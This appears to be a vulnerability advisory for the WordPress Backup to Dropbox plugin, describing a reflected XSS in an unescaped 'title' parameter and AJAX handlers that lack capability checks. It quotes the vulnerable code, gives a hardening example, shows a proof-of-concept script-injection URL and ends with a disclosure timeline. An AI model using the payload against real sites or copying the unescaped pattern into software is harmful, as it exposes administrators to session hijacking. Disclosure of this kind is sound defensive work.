The view wpb2d-premium.php is rendered for ?page=backup-to-dropbox-premium (a submenu registered with the activate_plugins capability):
File: wordpress-backup-to-dropbox\wp-backup-to-dropbox.php
add_submenu_page('backup-to-dropbox', $text, $text, 'activate_plugins', 'backup-to-dropbox-premium', 'backup_to_dropbox_premium');

function backup_to_dropbox_premium()
{
    wp_enqueue_script('jquery-ui-core');
    wp_enqueue_script('jquery-ui-tabs');
    $uri = rtrim(WP_PLUGIN_URL, '/') . '/wordpress-backup-to-dropbox';
    include 'Views/wpb2d-premium.php';
}
$_REQUEST['title'] is inserted into the settings notice without being escaped:
File: wordpress-backup-to-dropbox\Views\wpb2d-premium.php
if (isset($_REQUEST['title'])) {
    add_settings_error('general', 'wpb2d_premium_success', sprintf(__('You have succesfully purchased %s.', 'wpbtd'), "<strong>{$_REQUEST['title']}</strong>"), 'updated');
}
The AJAX handlers backup_to_dropbox_file_tree and backup_to_dropbox_progress are accessible to every registered user, since wp_ajax_ actions fire for any authenticated user and the registration below adds no capability check:
if (is_admin()) {
    //WordPress filters and actions
    add_action('wp_ajax_file_tree', 'backup_to_dropbox_file_tree');
    add_action('wp_ajax_progress', 'backup_to_dropbox_progress');

    if (defined('MULTISITE') && MULTISITE) {
        add_action('network_admin_menu', 'backup_to_dropbox_admin_menu');
    } else {
        add_action('admin_menu', 'backup_to_dropbox_admin_menu');
    }
}
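As an added example (not the plugin's own code, nor the fix shipped in 4.1), the following PHP shows how both findings can be closed: the reflected title is escaped with esc_html() before it reaches the notice, and the two wp_ajax_ callbacks are wrapped in a guard that requires the same activate_plugins capability the menu already uses. The wpb2d_hardened_* names are hypothetical; the WordPress functions used (esc_html, wp_unslash, current_user_can, wp_die) are core.

```php
<?php
// Added example, not the plugin's code. Assumes it runs inside WordPress.

// 1. Reflected XSS: escape user input before building HTML for the notice.
//    esc_html() neutralises <, >, &, " and ' so a <script> tag in ?title=
//    is shown as text instead of executed in the administrator's browser.
if (isset($_REQUEST['title'])) {
    $title = esc_html(wp_unslash($_REQUEST['title']));
    add_settings_error(
        'general',
        'wpb2d_premium_success',
        sprintf(__('You have successfully purchased %s.', 'wpbtd'), "<strong>{$title}</strong>"),
        'updated'
    );
}

// 2. Missing authorisation: wp_ajax_* hooks fire for every logged-in user,
//    so each handler must check a capability itself. Hypothetical helper.
function wpb2d_hardened_require_cap()
{
    if (!current_user_can('activate_plugins')) {
        // Stop with 403 before any backup data is read or written.
        wp_die(__('You are not allowed to do this.', 'wpbtd'), '', array('response' => 403));
    }
}

// Guarded wrappers that delegate to the plugin's original handlers
// (named on the page) only after the capability check passes.
function wpb2d_hardened_file_tree()
{
    wpb2d_hardened_require_cap();
    backup_to_dropbox_file_tree();
}

function wpb2d_hardened_progress()
{
    wpb2d_hardened_require_cap();
    backup_to_dropbox_progress();
}

// Register the guarded wrappers in place of the unguarded callbacks.
if (is_admin()) {
    add_action('wp_ajax_file_tree', 'wpb2d_hardened_file_tree');
    add_action('wp_ajax_progress', 'wpb2d_hardened_progress');
}
```

A nonce check (check_ajax_referer) on the same handlers would additionally protect the authorised administrator against cross-site requests, which the page does not cover.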
Proof of Concept
The XSS executes in the browser of an administrator who opens the following URL:
http://wordpress-install/wp-admin/admin.php?page=backup-to-dropbox-premium&title=<script>alert(String.fromCharCode(88,83,83));</script>
Timeline
- 10-11-2014: Discovered
- 10-11-2014: Vendor notified
- 19-11-2014: Second notification
- 22-12-2014: Version 4.1 released, issue resolved